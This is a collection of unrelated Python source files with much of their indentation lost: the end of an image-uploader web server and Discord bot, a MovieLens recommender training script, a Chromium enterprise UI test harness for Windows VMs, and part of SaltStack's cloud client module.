if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]):
try:
changes = APIkeyManagement.genkey(name, apikeys)
apikeys.update(changes["apikeys"])
newkey = changes["newkey"]
saveconfigs(apikeys, files, shortlinks)
return jsonify({"Status": 200, "Message": "OK", "newkey": newkey})
except Exception as e:
print(e)
return jsonify({"Status": 500, "Message": "Internal Server Error"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/admin/revokekey", methods=["DELETE"])
def admin_revoke_key():
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
key = str(request.headers.get("key"))
if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]):
try:
changes = APIkeyManagement.revokekey(key, apikeys)
apikeys.update(changes)
saveconfigs(apikeys, files, shortlinks)
return jsonify({"Status": 200, "Message": "OK"})
except:
return jsonify({"Status": 500, "Message": "Internal Server Error"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
# ==WEBSERVER=ADMIN==
def flask_thread():
try:
app.run(host=listen_address, port=port)
except:
print(u"\u001b[31mFailed to start webserver. Make sure you are authorized to listen on port " + str(
port) + " on " + str(listen_address) + " and try rerunning the application.\u001b[0m")
raise
x = threading.Thread(target=flask_thread)
x.start()
# =============================
# ==========WEBSERVER==========
# =============================
# ===========DISCORD===========
# =============================
def UserIsAuthorised(ctx):
if ctx.message.author.id in Config["bot"]["AuthUsers"]:
return True
else:
return False
bot = commands.Bot(Config["bot"]["prefix"])
@bot.event
async def on_ready():
spinner.stop()
activity = discord.Activity(name=Config["bot"]["playingstatus"], type=discord.ActivityType.watching)
await bot.change_presence(activity=activity)
AuthUsers = ""
for person in Config["bot"]["AuthUsers"]:
AuthUsers = AuthUsers + ", " + str(person)
AuthUsers = AuthUsers[2:]
ping = bot.latency
ping = ping * 1000
ping = round(ping, 2)
print(f"""
=========================================
Discord connected!
Discord Info:
Ping: {ping}
Username: {bot.user.name}
User ID: {bot.user.id}
Authorised User IDs: {AuthUsers}
=========================================
""")
@bot.group(name="files")
@commands.check(UserIsAuthorised)
async def __files_command_group__(ctx):
if ctx.invoked_subcommand is None:
embed = discord.Embed(title="Unknown or No Files Subcommand Passed",
description="You did not provide a known subcommand for the `files` command group, please use the help command for a list of subcommands.",
colour=0xff0000)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
@__files_command_group__.command(name="recent")
@commands.check(UserIsAuthorised)
async def __recent_file_command__(ctx):
try:
embed = discord.Embed(title="Most Recent File Uploaded",
description="The most recent file uploaded to the webserver. If an image does not embed, the file must not have been an image.")
embed.add_field(name="File Link", value=RecentFile, inline=False)
if RecentFile == "":
raise TypeError
embed.set_image(url=RecentFile)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
except TypeError:
await ctx.send("No files have been uploaded since ImageUploader started")
@__files_command_group__.command(name="rename")
@commands.check(UserIsAuthorised)
async def __rename_file__(ctx, currentfile: str, newfile: str):
try:
oldpath = os.path.join("data", "uploads", currentfile)
newpath = os.path.join("data", "uploads", newfile)
os.rename(oldpath, newpath)
        apikey = files[currentfile]
        del files[currentfile]
        files[newfile] = apikey
        fileindex = apikeys[apikey]["file-names"].index(currentfile)
        del apikeys[apikey]["file-names"][fileindex]
        apikeys[apikey]["file-names"].append(newfile)
        saveconfigs(apikeys, files, shortlinks)
embed = discord.Embed(title="The file was renamed", colour=0x00ff00)
embed.add_field(name=f"{WEBROOT}/uploads/{currentfile}", value=f"{WEBROOT}/uploads/{newfile}")
embed.set_image(url=f"{WEBROOT}/uploads/{newfile}")
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
except FileNotFoundError:
embed = discord.Embed(title="File not found",
description="The filename you have given was not found, please check the filename",
colour=0x00ff00)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
@__files_command_group__.command(name="delete")
@commands.check(UserIsAuthorised)
async def __delete_file__(ctx, deletefile: str):
try:
oldpath = os.path.join("data", "uploads", deletefile)
os.remove(oldpath)
        apikey = files[deletefile]
        del files[deletefile]
        fileindex = apikeys[apikey]["file-names"].index(deletefile)
        del apikeys[apikey]["file-names"][fileindex]
        saveconfigs(apikeys, files, shortlinks)
embed = discord.Embed(title="The file was removed", description="The file name you provided was removed.",
colour=0x00ff00)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
except FileNotFoundError:
embed = discord.Embed(title="File not found",
description="The filename you have given was not found, please check the filename",
colour=0x00ff00)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
@bot.group(name="links")
@commands.check(UserIsAuthorised)
async def __links_command_group__(ctx):
if ctx.invoked_subcommand is None:
embed = discord.Embed(title="Unknown or No Links Subcommand Passed",
description="You did not provide a known subcommand for the `links` command group, please use the help command for a list of subcommands.",
colour=0xff0000)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
@__links_command_group__.command(name="create")
@commands.check(UserIsAuthorised)
async def __create_link_command__(ctx):
try:
embed = discord.Embed(title="Most Recent File Uploaded",
description="The most recent file uploaded to the webserver. If an image does not embed, the file must not have been an image.")
embed.add_field(name="File Link", value=RecentFile, inline=False)
if RecentFile == "":
raise TypeError
embed.set_image(url=RecentFile)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
except TypeError:
await ctx.send("No files have been uploaded since ImageUploader started")
@__links_command_group__.command(name="rename")
@commands.check(UserIsAuthorised)
async def __rename_link__(ctx, oldid: str, newid: str):
    try:
        oldobj = shortlinks[oldid]
        del shortlinks[oldid]
        shortlinks[newid] = oldobj
        apikey = oldobj["key"]
        linkindex = apikeys[apikey]["short-urls"].index(oldid)
        apikeys[apikey]["short-urls"].pop(linkindex)
        apikeys[apikey]["short-urls"].append(newid)
        saveconfigs(apikeys, files, shortlinks)
        embed = discord.Embed(title="The link was renamed", colour=0x00ff00)
        embed.add_field(name=f"{WEBROOT}/link/{oldid}", value=f"{WEBROOT}/link/{newid}")
        embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
        await ctx.send(embed=embed)
    except KeyError:
        embed = discord.Embed(title="Link not found",
                              description="The link ID you have given was not found, please check the ID",
                              colour=0xff0000)
        embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
        await ctx.send(embed=embed)
@__links_command_group__.command(name="delete")
@commands.check(UserIsAuthorised)
async def __delete_link__(ctx, deleteid: str):
    try:
        apikey = shortlinks[deleteid]["key"]
        del shortlinks[deleteid]
        linkindex = apikeys[apikey]["short-urls"].index(deleteid)
        del apikeys[apikey]["short-urls"][linkindex]
        saveconfigs(apikeys, files, shortlinks)
        embed = discord.Embed(title="The link was removed", description="The link ID you provided was removed.",
                              colour=0x00ff00)
        embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
        await ctx.send(embed=embed)
    except KeyError:
        embed = discord.Embed(title="Link not found",
                              description="The link ID you have given was not found, please check the ID",
                              colour=0xff0000)
        embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
        await ctx.send(embed=embed)
@bot.group(name="key")
@commands.check(UserIsAuthorised)
async def __apikey_command_group__(ctx):
if ctx.invoked_subcommand is None:
embed = discord.Embed(title="Unknown or No API Key Management Subcommand Passed",
description="You did not provide a known subcommand for the `key` command group, please use the help command for a list of subcommands.",
colour=0xff0000)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
@__apikey_command_group__.command(name="generate")
@commands.check(UserIsAuthorised)
async def __generate_api_key__(ctx, name: str):
try:
changes = APIkeyManagement.genkey(name, apikeys)
apikeys.update(changes["apikeys"])
newkey = changes["newkey"]
saveconfigs(apikeys, files, shortlinks)
embed = discord.Embed(title="API Key Generated", description="The API key was generated", colour=0x00ff00)
embed.add_field(name="API Key", value=newkey)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
except Exception as e:
embed = discord.Embed(title="An Error Occurred",
description="An internal error occurred, this error has been logged to the console",
colour=0x00ff00)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
print(u"\u001b[31m" + str(e) + "\u001b[0m")
@__apikey_command_group__.command(name="revoke")
@commands.check(UserIsAuthorised)
async def __revoke_api_key__(ctx, key: str):
try:
changes = APIkeyManagement.revokekey(key, apikeys)
apikeys.update(changes)
saveconfigs(apikeys, files, shortlinks)
embed = discord.Embed(title="API Key Revoked", description="", colour=0x00ff00)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
except Exception as e:
embed = discord.Embed(title="An Error Occurred",
description="An internal error occurred, this error has been logged to the console",
colour=0x00ff00)
embed.set_footer(text="ImageUploader developed by sniff122/Lewis L. Foster")
await ctx.send(embed=embed)
print(u"\u001b[31m" + str(e) + "\u001b[0m")
time.sleep(1)
if Config["bot"]["Enabled"] == "True":
spinner.text = "Attempting to start Discord bot, please wait"
spinner.start()
try:
bot.run(Config["bot"]["token"])
except aiohttp.client_exceptions.ClientConnectorError:
spinner.stop()
print("""
=============================================================
| The bot failed to connect to discord! |
| Please ensure that this server has an internet connection.|
| The bot will be disabled for this session. |
=============================================================
""")
else:
print("""
=============================================================
| The bot is disabled! |
| Functionality that uses Discord will be unavailable! |
| Please see the documentation for disabled features. |
=============================================================
""")
# =============================
# ==========DISCORD============
# =============================
|
train.py
|
from surprise import Dataset, evaluate
from surprise import KNNBasic
import zipfile
import os, io
import urllib.request
from sklearn.externals import joblib
from collections import defaultdict
from azureml.core.run import Run
import multiprocessing
def get_top3_recommendations(predictions, topN = 3):
top_recs = defaultdict(list)
for uid, iid, true_r, est, _ in predictions:
top_recs[uid].append((iid, est))
for uid, user_ratings in top_recs.items():
user_ratings.sort(key = lambda x: x[1], reverse = True)
top_recs[uid] = user_ratings[:topN]
return top_recs
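# Hedged example (illustrative values only, not from the original script): if predictions
# contains ('u1', 'i1', 4.0, 3.2, {}), ('u1', 'i2', 3.0, 4.8, {}) and ('u1', 'i3', 5.0, 4.1, {}),
# get_top3_recommendations returns {'u1': [('i2', 4.8), ('i3', 4.1), ('i1', 3.2)]},
# i.e. each user's items sorted by estimated rating in descending order.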
def read_item_names():
"""Read the u.item file from MovieLens 100-k dataset and returns a
mapping to convert raw ids into movie names.
"""
file_name = (os.path.expanduser('~') +
'/.surprise_data/ml-100k/ml-100k/u.item')
rid_to_name = {}
with io.open(file_name, 'r', encoding='ISO-8859-1') as f:
for line in f:
line = line.split('|')
rid_to_name[line[0]] = line[1]
return rid_to_name
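# Hedged illustration (added note): a u.item line such as
# '1|Toy Story (1995)|01-Jan-1995|...' is split on '|', so rid_to_name['1'] becomes
# 'Toy Story (1995)'.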
def executeTraining(modelFileName, simOptions):
knn = KNNBasic(sim_options=simOptions, k=3)
knn.train(trainingSet)
testSet = trainingSet.build_anti_testset()
predictions = knn.test(testSet)
os.makedirs('./outputs', exist_ok=True)
joblib.dump(knn, os.path.join('./outputs', modelFileName))
run = Run.get_submitted_run()
# manually downloading the file, as it requires a prompt otherwise
url='http://files.grouplens.org/datasets/movielens/ml-100k.zip'
DATASETS_DIR = os.path.expanduser('~') + '/.surprise_data/'
print("Starting")
name = 'ml-100k'
os.makedirs(DATASETS_DIR, exist_ok=True)
urllib.request.urlretrieve(url, DATASETS_DIR + 'tmp.zip')
with zipfile.ZipFile(DATASETS_DIR + 'tmp.zip', 'r') as tmp_zip:
tmp_zip.extractall(DATASETS_DIR + name)
data = Dataset.load_builtin(name)
trainingSet = data.build_full_trainset()
#############################################################################################################################
modelVariations={
"model1.pkl": {
'name': 'cosine',
'user_based': False
},
"model2.pkl": {
'name': 'cosine',
'user_based': True
},
"model3.pkl": {
'name': 'msd',
'user_based': True
}
}
threads = []
for modelFileName, sim_options in modelVariations.items():
t = multiprocessing.Process(name=modelFileName, target=executeTraining, args=(modelFileName, sim_options))
t.start()
threads.append(t)
# Wait for all threads
for thread in threads:
print("In loop of join")
thread.join()
print("Join loop over")
|
ui_test.py
|
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
import random
import string
import subprocess
import threading
import time
from datetime import datetime
from chrome_ent_test.infra.core import *
@category("core")
@environment(file="./assets/ui_test.asset.textpb")
class UITest(EnterpriseTestCase):
"""Tests that running UI tests works on all versions of Windows.
"""
def _enableUITest(self, instance_name):
"""Configures the instance so that UI tests can be run on it."""
self.RunCommand(instance_name, r'md -Force c:\temp')
self.InstallChocolateyPackage(instance_name, 'chocolatey_core_extension',
'1.3.3')
self.InstallChocolateyPackage(instance_name, 'sysinternals',
'2019.6.12.20190614')
self.InstallPipPackagesLatest(
instance_name, ['absl-py', 'requests', 'pyperclip', 'pywinauto'])
password = self._generatePassword()
user_name = 'ui_user'
cmd = (r'powershell -File c:\cel\supporting_files\enable_auto_logon.ps1 '
r'-userName %s -password %s') % (user_name, password)
self.RunCommand(instance_name, cmd)
self._rebootInstance(instance_name)
cmd = (r'powershell -File c:\cel\supporting_files\set_ui_agent.ps1 '
'-username %s') % user_name
self.RunCommand(instance_name, cmd)
self._rebootInstance(instance_name)
def _rebootInstance(self, instance_name):
self.RunCommand(instance_name, 'shutdown /r /t 0')
# wait a little so that we can be sure the instance is
# rebooting
time.sleep(30)
# wait for the instance to boot up and ready
start_time = datetime.now()
while True:
try:
self.RunCommand(instance_name, 'whoami')
break
except:
logging.info('Instance is not ready. Retry')
now = datetime.now()
time_used = (now - start_time).total_seconds()
if time_used > 5 * 60:
self.fail("Time out when waiting for instance to boot up")
else:
time.sleep(60)
def _generatePassword(self):
"""Generates a random password."""
s = [random.choice(string.ascii_lowercase) for _ in range(4)]
s += [random.choice(string.ascii_uppercase) for _ in range(4)]
s += [random.choice(string.digits) for _ in range(4)]
random.shuffle(s)
return ''.join(s)
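# Illustrative note (added, not in the original source): the generated password is
# always 12 characters long, 4 lowercase letters, 4 uppercase letters and 4 digits
# in shuffled order, e.g. something like 'abQZ19xR3k7M' (hypothetical value).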
def _runUITest(self, instance_name, test_file, timeout=300, args=[]):
"""Runs a UI test on an instance.
Args:
instance_name: name of the instance.
test_file: the path of the UI test file.
timeout: the timeout in seconds. Default is 300,
i.e. 5 minutes.
args: the list of arguments passed to the test.
Returns:
the output."""
self.EnsurePythonInstalled(instance_name)
# upload the test
file_name = self.UploadFile(instance_name, test_file, r'c:\temp')
# run the test.
# note that '-u' flag is passed to enable unbuffered stdout and stderr.
# Without this flag, if the test is killed because of timeout, we will not
# get any output from stdout because the output is buffered. When this
# happens it makes debugging really hard.
args = subprocess.list2cmdline(args)
ui_test_cmd = r'{0} -u {1} {2}'.format(
self._pythonExecutablePath[instance_name], file_name, args)
cmd = (r'{0} '
r'c:\cel\supporting_files\run_ui_test.py '
r'--timeout {1} -- {2}').format(
self._pythonExecutablePath[instance_name], timeout, ui_test_cmd)
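    # Illustrative example of the composed command (the Python path depends on
    # where it was installed on the instance):
    #   <python.exe> c:\cel\supporting_files\run_ui_test.py --timeout 300 --
    #   <python.exe> -u c:\temp\<test_file> <args>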
return self.RunCommand(instance_name, cmd)
def _runUITestOnInstance(self, instance_name, error):
"""Runs a UI test on the specified instance.
Args:
instance_name: the instance where the UI test is run
error: a list. If the UI test cannot run successfully, an
error message will be appended to the list
"""
try:
self._enableUITest(instance_name)
dir = os.path.dirname(os.path.abspath(__file__))
test_file = os.path.join(dir, 'ui_test_on_instance.py')
output = self._runUITest(instance_name, test_file)
self.assertIn('SUCCESS', output)
self.assertIn('PASTE', output)
except:
error += ["UI test failed on %s" % instance_name]
@test
def runUITests(self):
    # Run tests on the instances in parallel. Each instance takes about 10
    # minutes, so running them sequentially would take several times that long.
threads = []
error = []
for client in ['win2008', 'win2012', 'win2016']:
threads += [
threading.Thread(
target=self._runUITestOnInstance, args=(client, error))
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# assert that there are no errors
self.assertFalse(error)
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
The top level interface used to translate configuration data back to the
correct cloud modules
"""
# Import python libs
from __future__ import absolute_import, generators, print_function, unicode_literals
import copy
import glob
import logging
import multiprocessing
import os
import signal
import sys
import time
import traceback
from itertools import groupby
import salt.client
# Import salt libs
import salt.config
import salt.loader
import salt.syspaths
import salt.utils.args
import salt.utils.cloud
import salt.utils.context
import salt.utils.crypt
import salt.utils.data
import salt.utils.dictupdate
import salt.utils.files
import salt.utils.user
import salt.utils.verify
import salt.utils.yaml
# Import salt.cloud libs
from salt.exceptions import (
SaltCloudConfigError,
SaltCloudException,
SaltCloudNotFound,
SaltCloudSystemExit,
)
from salt.ext import six
from salt.ext.six.moves import input # pylint: disable=import-error,redefined-builtin
from salt.template import compile_template
# Import third party libs
try:
import Cryptodome.Random
except ImportError:
try:
import Crypto.Random
except ImportError:
pass # pycrypto < 2.1
# Get logging started
log = logging.getLogger(__name__)
def communicator(func):
"""Warning, this is a picklable decorator !"""
def _call(queue, args, kwargs):
"""called with [queue, args, kwargs] as first optional arg"""
kwargs["queue"] = queue
ret = None
try:
ret = func(*args, **kwargs)
queue.put("END")
except KeyboardInterrupt as ex:
trace = traceback.format_exc()
queue.put("KEYBOARDINT")
queue.put("Keyboard interrupt")
queue.put("{0}\n{1}\n".format(ex, trace))
except Exception as ex: # pylint: disable=broad-except
trace = traceback.format_exc()
queue.put("ERROR")
queue.put("Exception")
queue.put("{0}\n{1}\n".format(ex, trace))
except SystemExit as ex:
trace = traceback.format_exc()
queue.put("ERROR")
queue.put("System exit")
queue.put("{0}\n{1}\n".format(ex, trace))
return ret
return _call
def enter_mainloop(
target,
mapped_args=None,
args=None,
kwargs=None,
pool=None,
pool_size=None,
callback=None,
queue=None,
):
"""
Manage a multiprocessing pool
    - If the queue does not output anything, the pool runs indefinitely
    - If the queue returns KEYBOARDINT or ERROR, the pool is terminated by
      calling terminate & join, and a SaltCloudSystemExit exception is raised
      to notify callers of the abnormal termination
    - If the queue returns END, or callback is defined and returns True,
      the pool is simply joined and the data is returned.
    target
        the function you want to execute via multiprocessing
    pool
        pool object; can be None if you want a default pool, but you will
        then have to define pool_size instead
    pool_size
        pool size if you did not provide a pool yourself
    callback
        a callable taking a string argument which returns True to
        signal that 'target' is finished and the pool needs to be
        joined
    queue
        a custom multiprocessing queue in case you want to do
        extra work and need it later in your program
    args
        positional arguments to call the function with
        if you don't want to use pool.map
    mapped_args
        a list of one or more argument combinations to call the function with,
        e.g. (foo, [[1], [2]]) will call::
            foo([1])
            foo([2])
    kwargs
        keyword arguments to pass to the function
    Attention: the function must have the following signature:
        target(queue, *args, **kw)
    You may use the 'communicator' decorator above to generate such a function
    (see the end of this file for examples)
"""
if not kwargs:
kwargs = {}
if not pool_size:
pool_size = 1
if not pool:
pool = multiprocessing.Pool(pool_size)
if not queue:
manager = multiprocessing.Manager()
queue = manager.Queue()
if mapped_args is not None and not mapped_args:
msg = (
"We are called to asynchronously execute {0}"
" but we do no have anything to execute, weird,"
" we bail out".format(target)
)
log.error(msg)
raise SaltCloudSystemExit("Exception caught\n{0}".format(msg))
elif mapped_args is not None:
iterable = [[queue, [arg], kwargs] for arg in mapped_args]
ret = pool.map(func=target, iterable=iterable)
else:
ret = pool.apply(target, [queue, args, kwargs])
while True:
test = queue.get()
if test in ["ERROR", "KEYBOARDINT"]:
type_ = queue.get()
trace = queue.get()
msg = "Caught {0}, terminating workers\n".format(type_)
msg += "TRACE: {0}\n".format(trace)
log.error(msg)
pool.terminate()
pool.join()
raise SaltCloudSystemExit("Exception caught\n{0}".format(msg))
elif test in ["END"] or (callback and callback(test)):
pool.close()
pool.join()
break
else:
time.sleep(0.125)
return ret
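# Illustrative sketch (not part of the original module): how 'communicator'
# and 'enter_mainloop' fit together. pool.map() hands the target a single
# [queue, [arg], kwargs] item, so a small module-level shim unpacks it before
# calling the communicator-wrapped worker, which keeps the picklable surface a
# plain module-level function. All '_example_*' names are hypothetical.
def _example_worker(item, queue=None):
    # A real worker would do per-item work here and could push progress
    # messages onto 'queue'; the communicator wrapper adds the final marker.
    return "processed {0}".format(item)
def _example_worker_shim(*args, **kw):
    # Unpack the [queue, [arg], kwargs] item built by enter_mainloop.
    return communicator(_example_worker)(*args[0], **kw)
def _example_enter_mainloop_usage():
    # Runs _example_worker("alpha") and _example_worker("beta") in a pool of
    # two processes and returns the collected results once an END marker has
    # been seen on the queue.
    return enter_mainloop(
        _example_worker_shim, mapped_args=["alpha", "beta"], pool_size=2
    )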
class CloudClient(object):
"""
The client class to wrap cloud interactions
"""
def __init__(self, path=None, opts=None, config_dir=None, pillars=None):
if opts:
self.opts = opts
else:
self.opts = salt.config.cloud_config(path)
# Check the cache-dir exists. If not, create it.
v_dirs = [self.opts["cachedir"]]
salt.utils.verify.verify_env(v_dirs, salt.utils.user.get_user())
if pillars:
for name, provider in six.iteritems(pillars.pop("providers", {})):
driver = provider["driver"]
provider["profiles"] = {}
self.opts["providers"].update({name: {driver: provider}})
for name, profile in six.iteritems(pillars.pop("profiles", {})):
provider = profile["provider"].split(":")[0]
driver = next(six.iterkeys(self.opts["providers"][provider]))
profile["provider"] = "{0}:{1}".format(provider, driver)
profile["profile"] = name
self.opts["profiles"].update({name: profile})
self.opts["providers"][provider][driver]["profiles"].update(
{name: profile}
)
for name, map_dct in six.iteritems(pillars.pop("maps", {})):
if "maps" not in self.opts:
self.opts["maps"] = {}
self.opts["maps"][name] = map_dct
self.opts.update(pillars)
def _opts_defaults(self, **kwargs):
"""
Set the opts dict to defaults and allow for opts to be overridden in
the kwargs
"""
# Let's start with the default salt cloud configuration
opts = salt.config.DEFAULT_CLOUD_OPTS.copy()
# Update it with the loaded configuration
opts.update(self.opts.copy())
# Reset some of the settings to sane values
opts["parallel"] = False
opts["keep_tmp"] = False
opts["deploy"] = True
opts["update_bootstrap"] = False
opts["show_deploy_args"] = False
opts["script_args"] = ""
# Update it with the passed kwargs
if "kwargs" in kwargs:
opts.update(kwargs["kwargs"])
opts.update(kwargs)
profile = opts.get("profile", None)
# filter other profiles if one is specified
if profile:
tmp_profiles = opts.get("profiles", {}).copy()
for _profile in [a for a in tmp_profiles]:
                if _profile != profile:
tmp_profiles.pop(_profile)
# if profile is specified and we have enough info about providers
# also filter them to speedup methods like
# __filter_non_working_providers
providers = [
a.get("provider", "").split(":")[0]
for a in six.itervalues(tmp_profiles)
if a.get("provider", "")
]
if providers:
_providers = opts.get("providers", {})
for provider in _providers.copy():
if provider not in providers:
_providers.pop(provider)
return opts
def low(self, fun, low):
"""
Pass the cloud function and low data structure to run
"""
l_fun = getattr(self, fun)
f_call = salt.utils.args.format_call(l_fun, low)
return l_fun(*f_call.get("args", ()), **f_call.get("kwargs", {}))
def list_sizes(self, provider=None):
"""
List all available sizes in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.size_list(provider))
def list_images(self, provider=None):
"""
List all available images in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.image_list(provider))
def list_locations(self, provider=None):
"""
List all available locations in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.location_list(provider))
def query(self, query_type="list_nodes"):
"""
Query basic instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes"
return mapper.map_providers_parallel(query_type)
def full_query(self, query_type="list_nodes_full"):
"""
Query all instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_full"
return mapper.map_providers_parallel(query_type)
def select_query(self, query_type="list_nodes_select"):
"""
Query select instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_select"
return mapper.map_providers_parallel(query_type)
def min_query(self, query_type="list_nodes_min"):
"""
        Query minimal instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_min"
return mapper.map_providers_parallel(query_type)
def profile(self, profile, names, vm_overrides=None, **kwargs):
"""
Pass in a profile to create, names is a list of vm names to allocate
vm_overrides is a special dict that will be per node options
overrides
Example:
.. code-block:: python
>>> client= salt.cloud.CloudClient(path='/etc/salt/cloud')
>>> client.profile('do_512_git', names=['minion01',])
{'minion01': {'backups_active': 'False',
'created_at': '2014-09-04T18:10:15Z',
'droplet': {'event_id': 31000502,
'id': 2530006,
'image_id': 5140006,
'name': 'minion01',
'size_id': 66},
'id': '2530006',
'image_id': '5140006',
'ip_address': '107.XXX.XXX.XXX',
'locked': 'True',
'name': 'minion01',
'private_ip_address': None,
'region_id': '4',
'size_id': '66',
'status': 'new'}}
"""
if not vm_overrides:
vm_overrides = {}
kwargs["profile"] = profile
mapper = salt.cloud.Map(self._opts_defaults(**kwargs))
if isinstance(names, six.string_types):
names = names.split(",")
return salt.utils.data.simple_types_filter(
mapper.run_profile(profile, names, vm_overrides=vm_overrides)
)
def map_run(self, path=None, **kwargs):
"""
To execute a map
"""
kwarg = {}
if path:
kwarg["map"] = path
kwarg.update(kwargs)
mapper = salt.cloud.Map(self._opts_defaults(**kwarg))
dmap = mapper.map_data()
return salt.utils.data.simple_types_filter(mapper.run_map(dmap))
def destroy(self, names):
"""
Destroy the named VMs
"""
mapper = salt.cloud.Map(self._opts_defaults(destroy=True))
if isinstance(names, six.string_types):
names = names.split(",")
return salt.utils.data.simple_types_filter(mapper.destroy(names))
def create(self, provider, names, **kwargs):
"""
Create the named VMs, without using a profile
Example:
.. code-block:: python
client.create(provider='my-ec2-config', names=['myinstance'],
image='ami-1624987f', size='t1.micro', ssh_username='ec2-user',
securitygroup='default', delvol_on_destroy=True)
"""
mapper = salt.cloud.Map(self._opts_defaults())
providers = self.opts["providers"]
if provider in providers:
provider += ":{0}".format(next(six.iterkeys(providers[provider])))
else:
return False
if isinstance(names, six.string_types):
names = names.split(",")
ret = {}
for name in names:
vm_ = kwargs.copy()
vm_["name"] = name
vm_["driver"] = provider
# This function doesn't require a profile, but many cloud drivers
# check for profile information (which includes the provider key) to
# help with config file debugging and setting up instances. Setting
# the profile and provider defaults here avoids errors in other
# cloud functions relying on these keys. See SaltStack Issue #41971
# and PR #38166 for more information.
vm_["profile"] = None
vm_["provider"] = provider
ret[name] = salt.utils.data.simple_types_filter(mapper.create(vm_))
return ret
def extra_action(self, names, provider, action, **kwargs):
"""
Perform actions with block storage devices
Example:
.. code-block:: python
client.extra_action(names=['myblock'], action='volume_create',
provider='my-nova', kwargs={'voltype': 'SSD', 'size': 1000}
)
client.extra_action(names=['salt-net'], action='network_create',
provider='my-nova', kwargs={'cidr': '192.168.100.0/24'}
)
"""
mapper = salt.cloud.Map(self._opts_defaults())
providers = mapper.map_providers_parallel()
if provider in providers:
provider += ":{0}".format(next(six.iterkeys(providers[provider])))
else:
return False
if isinstance(names, six.string_types):
names = names.split(",")
ret = {}
for name in names:
extra_ = kwargs.copy()
extra_["name"] = name
extra_["provider"] = provider
extra_["profile"] = None
extra_["action"] = action
ret[name] = salt.utils.data.simple_types_filter(mapper.extras(extra_))
return ret
def action(
self,
fun=None,
cloudmap=None,
names=None,
provider=None,
instance=None,
kwargs=None,
):
"""
Execute a single action via the cloud plugin backend
Examples:
.. code-block:: python
client.action(fun='show_instance', names=['myinstance'])
client.action(fun='show_image', provider='my-ec2-config',
kwargs={'image': 'ami-10314d79'}
)
"""
if kwargs is None:
kwargs = {}
mapper = salt.cloud.Map(self._opts_defaults(action=fun, names=names, **kwargs))
if instance:
if names:
raise SaltCloudConfigError(
"Please specify either a list of 'names' or a single "
"'instance', but not both."
)
names = [instance]
if names and not provider:
self.opts["action"] = fun
return mapper.do_action(names, kwargs)
if provider and not names:
return mapper.do_function(provider, fun, kwargs)
else:
# This should not be called without either an instance or a
# provider. If both an instance/list of names and a provider
# are given, then we also need to exit. We can only have one
# or the other.
raise SaltCloudConfigError(
"Either an instance (or list of names) or a provider must be "
"specified, but not both."
)
class Cloud(object):
"""
An object for the creation of new VMs
"""
def __init__(self, opts):
self.opts = opts
self.clouds = salt.loader.clouds(self.opts)
self.__filter_non_working_providers()
self.__cached_provider_queries = {}
def get_configured_providers(self):
"""
Return the configured providers
"""
providers = set()
for alias, drivers in six.iteritems(self.opts["providers"]):
if len(drivers) > 1:
for driver in drivers:
providers.add("{0}:{1}".format(alias, driver))
continue
providers.add(alias)
return providers
def lookup_providers(self, lookup):
"""
Get a dict describing the configured providers
"""
if lookup is None:
lookup = "all"
if lookup == "all":
providers = set()
for alias, drivers in six.iteritems(self.opts["providers"]):
for driver in drivers:
providers.add((alias, driver))
if not providers:
raise SaltCloudSystemExit("There are no cloud providers configured.")
return providers
if ":" in lookup:
alias, driver = lookup.split(":")
if (
alias not in self.opts["providers"]
or driver not in self.opts["providers"][alias]
):
raise SaltCloudSystemExit(
"No cloud providers matched '{0}'. Available: {1}".format(
lookup, ", ".join(self.get_configured_providers())
)
)
providers = set()
for alias, drivers in six.iteritems(self.opts["providers"]):
for driver in drivers:
if lookup in (alias, driver):
providers.add((alias, driver))
if not providers:
raise SaltCloudSystemExit(
"No cloud providers matched '{0}'. "
"Available selections: {1}".format(
lookup, ", ".join(self.get_configured_providers())
)
)
return providers
def lookup_profiles(self, provider, lookup):
"""
Return a dictionary describing the configured profiles
"""
if provider is None:
provider = "all"
if lookup is None:
lookup = "all"
if lookup == "all":
profiles = set()
provider_profiles = set()
